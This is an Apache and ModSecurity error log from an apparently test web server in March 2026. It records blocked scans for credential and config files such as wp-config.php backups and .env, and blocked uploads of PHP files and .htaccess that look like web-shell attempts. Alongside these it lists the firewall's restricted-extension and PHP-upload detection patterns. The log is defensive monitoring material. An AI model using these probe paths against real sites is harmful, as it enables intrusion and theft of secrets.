[Sun Mar 15 10:46:56.604676 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "abaAEFRPDbn7htWAttP1qwAAAAI"]
[Sun Mar 15 10:46:56.604855 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "abaAEFRPDbn7htWAttP1qwAAAAI"]
[Sun Mar 15 10:46:56.604973 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.backup"] [unique_id "abaAEFRPDbn7htWAttP1qwAAAAI"]
[Sun Mar 15 10:46:56.831148 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/config/.env"] [unique_id "abaAEFRPDbn7htWAttP1tQAAAAI"]
[Sun Mar 15 10:46:56.831303 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/config/.env"] [unique_id "abaAEFRPDbn7htWAttP1tQAAAAI"]
[Sun Mar 15 10:46:56.831415 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/config/.env"] [unique_id "abaAEFRPDbn7htWAttP1tQAAAAI"]
[Sun Mar 15 10:46:56.944180 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/logs/error.log"] [unique_id "abaAEFRPDbn7htWAttP1ugAAAAI"]
[Sun Mar 15 10:46:56.944523 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/logs/error.log"] [unique_id "abaAEFRPDbn7htWAttP1ugAAAAI"]
[Sun Mar 15 10:46:56.944632 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/logs/error.log"] [unique_id "abaAEFRPDbn7htWAttP1ugAAAAI"]
[Sun Mar 15 10:46:57.012251 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/composer.json"] [unique_id "abaAEVRPDbn7htWAttP1vQAAAAI"]
[Sun Mar 15 10:46:57.012409 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/composer.json"] [unique_id "abaAEVRPDbn7htWAttP1vQAAAAI"]
[Sun Mar 15 10:46:57.012522 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/composer.json"] [unique_id "abaAEVRPDbn7htWAttP1vQAAAAI"]
[Sun Mar 15 10:46:57.034388 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/composer.lock" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.lock found within REQUEST_FILENAME: /composer.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/composer.lock"] [unique_id "abaAEVRPDbn7htWAttP1vgAAAAI"]
[Sun Mar 15 10:46:57.034552 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/composer.lock"] [unique_id "abaAEVRPDbn7htWAttP1vgAAAAI"]
[Sun Mar 15 10:46:57.034659 2026] [:error] [pid 2708246] [client 185.177.72.49:29896] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/composer.lock"] [unique_id "abaAEVRPDbn7htWAttP1vgAAAAI"]
[Sat Mar 21 03:19:52.980106 2026] [:error] [pid 2836927] [client 103.74.173.195:60148] [client 103.74.173.195] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: txets.php found within FILES:file: txets.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "ab4ASCcEfGZAHyIZnYBwEgAAAAQ"]
[Sat Mar 21 03:19:52.981544 2026] [:error] [pid 2836927] [client 103.74.173.195:60148] [client 103.74.173.195] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "ab4ASCcEfGZAHyIZnYBwEgAAAAQ"]
[Sat Mar 21 03:19:52.981695 2026] [:error] [pid 2836927] [client 103.74.173.195:60148] [client 103.74.173.195] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "ab4ASCcEfGZAHyIZnYBwEgAAAAQ"]
[Sat Mar 21 04:41:48.883418 2026] [:error] [pid 2836924] [client 101.99.88.90:52196] [client 101.99.88.90] ModSecurity: Warning. Matched phrase ".htaccess" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "601"] [id "932180"] [msg "Restricted File Upload Attempt"] [data "Matched Data: .htaccess found within FILES:file: .htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "ab4TfNTas8ZTYtMe0Y3Q4QAAAAE"]
[Sat Mar 21 04:41:48.886731 2026] [:error] [pid 2836924] [client 101.99.88.90:52196] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "ab4TfNTas8ZTYtMe0Y3Q4QAAAAE"]
[Sat Mar 21 04:41:48.886894 2026] [:error] [pid 2836924] [client 101.99.88.90:52196] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "ab4TfNTas8ZTYtMe0Y3Q4QAAAAE"]
[Sat Mar 21 04:41:49.069824 2026] [:error] [pid 2836924] [client 101.99.88.90:52196] [client 101.99.88.90] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: about.php found within FILES:file: about.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "ab4TfdTas8ZTYtMe0Y3Q4gAAAAE"]
[Sat Mar 21 04:41:49.069951 2026] [:error] [pid 2836924] [client 101.99.88.90:52196] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "ab4TfdTas8ZTYtMe0Y3Q4gAAAAE"]
[Sat Mar 21 04:41:49.070087 2026] [:error] [pid 2836924] [client 101.99.88.90:52196] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "ab4TfdTas8ZTYtMe0Y3Q4gAAAAE"]
[Sat Mar 21 04:41:59.806021 2026] [:error] [pid 2836927] [client 101.99.88.90:55148] [client 101.99.88.90] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: about.php found within FILES:file: about.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "ab4ThycEfGZAHyIZnYBwUAAAAAQ"]
[Sat Mar 21 04:41:59.806152 2026] [:error] [pid 2836927] [client 101.99.88.90:55148] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "ab4ThycEfGZAHyIZnYBwUAAAAAQ"]
[Sat Mar 21 04:41:59.806275 2026] [:error] [pid 2836927] [client 101.99.88.90:55148] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "ab4ThycEfGZAHyIZnYBwUAAAAAQ"]
[Mon Mar 23 04:36:47.265418 2026] [authz_core:error] [pid 2882126] [client 165.154.42.229:33636] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/, referer: http://autumnus.test.indacotrentino.com/app/
[Mon Mar 23 04:36:54.829433 2026] [authz_core:error] [pid 2883359] [client 165.154.42.229:33650] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/, referer: http://autumnus.test.indacotrentino.com/app/
[Mon Mar 23 04:36:57.571149 2026] [authz_core:error] [pid 2883362] [client 165.154.42.229:33690] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/js, referer: http://autumnus.test.indacotrentino.com/app/js/base.js
[Mon Mar 23 04:37:06.488065 2026] [authz_core:error] [pid 2883363] [client 165.154.42.229:33674] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/static, referer: http://autumnus.test.indacotrentino.com/app/static/js/download.js
[Mon Mar 23 04:37:07.582174 2026] [authz_core:error] [pid 2883367] [client 165.154.42.229:33708] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/static, referer: http://autumnus.test.indacotrentino.com/app/static/picture/star.png
[Mon Mar 23 04:37:12.480571 2026] [authz_core:error] [pid 2883367] [client 165.154.42.229:33708] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/, referer: https://autumnus.test.indacotrentino.com/app/
[Mon Mar 23 04:37:14.491992 2026] [authz_core:error] [pid 2883370] [client 165.154.42.229:52274] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/, referer: https://autumnus.test.indacotrentino.com/app/
[Mon Mar 23 04:37:15.644005 2026] [authz_core:error] [pid 2883364] [client 165.154.42.229:33684] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/js, referer: https://autumnus.test.indacotrentino.com/app/js/base.js
[Mon Mar 23 04:37:19.900053 2026] [authz_core:error] [pid 2882126] [client 165.154.42.229:33636] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/static, referer: https://autumnus.test.indacotrentino.com/app/static/js/download.js
[Mon Mar 23 04:37:20.466051 2026] [authz_core:error] [pid 2883363] [client 165.154.42.229:33674] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/static, referer: https://autumnus.test.indacotrentino.com/app/static/picture/star.png
[Mon Mar 23 23:04:17.277848 2026] [php:error] [pid 2883370] [client 4.206.18.91:14278] script '/var/www/magento.test.indacotrentino.com/www/pub/images/m.php' not found or unable to stat
[Wed Mar 25 04:57:12.744952 2026] [:error] [pid 2925314] [client 103.74.173.195:50967] [client 103.74.173.195] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: txets.php found within FILES:file: txets.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acNdGPBw37e5ziHgAJC7pAAAAAM"]
[Wed Mar 25 04:57:12.746107 2026] [:error] [pid 2925314] [client 103.74.173.195:50967] [client 103.74.173.195] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acNdGPBw37e5ziHgAJC7pAAAAAM"]
[Wed Mar 25 04:57:12.746250 2026] [:error] [pid 2925314] [client 103.74.173.195:50967] [client 103.74.173.195] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acNdGPBw37e5ziHgAJC7pAAAAAM"]
[Wed Mar 25 08:00:52.888529 2026] [:error] [pid 2927241] [client 101.99.88.90:51628] [client 101.99.88.90] ModSecurity: Warning. Matched phrase ".htaccess" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "601"] [id "932180"] [msg "Restricted File Upload Attempt"] [data "Matched Data: .htaccess found within FILES:file: .htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOIJOO5b7pUQD7n2ABPIgAAAAA"]
[Wed Mar 25 08:00:52.888690 2026] [:error] [pid 2927241] [client 101.99.88.90:51628] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOIJOO5b7pUQD7n2ABPIgAAAAA"]
[Wed Mar 25 08:00:52.888831 2026] [:error] [pid 2927241] [client 101.99.88.90:51628] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOIJOO5b7pUQD7n2ABPIgAAAAA"]
[Wed Mar 25 08:00:53.078539 2026] [:error] [pid 2927241] [client 101.99.88.90:51628] [client 101.99.88.90] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: pages.php found within FILES:file: pages.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOIJeO5b7pUQD7n2ABPIwAAAAA"]
[Wed Mar 25 08:00:53.078677 2026] [:error] [pid 2927241] [client 101.99.88.90:51628] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOIJeO5b7pUQD7n2ABPIwAAAAA"]
[Wed Mar 25 08:00:53.078822 2026] [:error] [pid 2927241] [client 101.99.88.90:51628] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acOIJeO5b7pUQD7n2ABPIwAAAAA"]
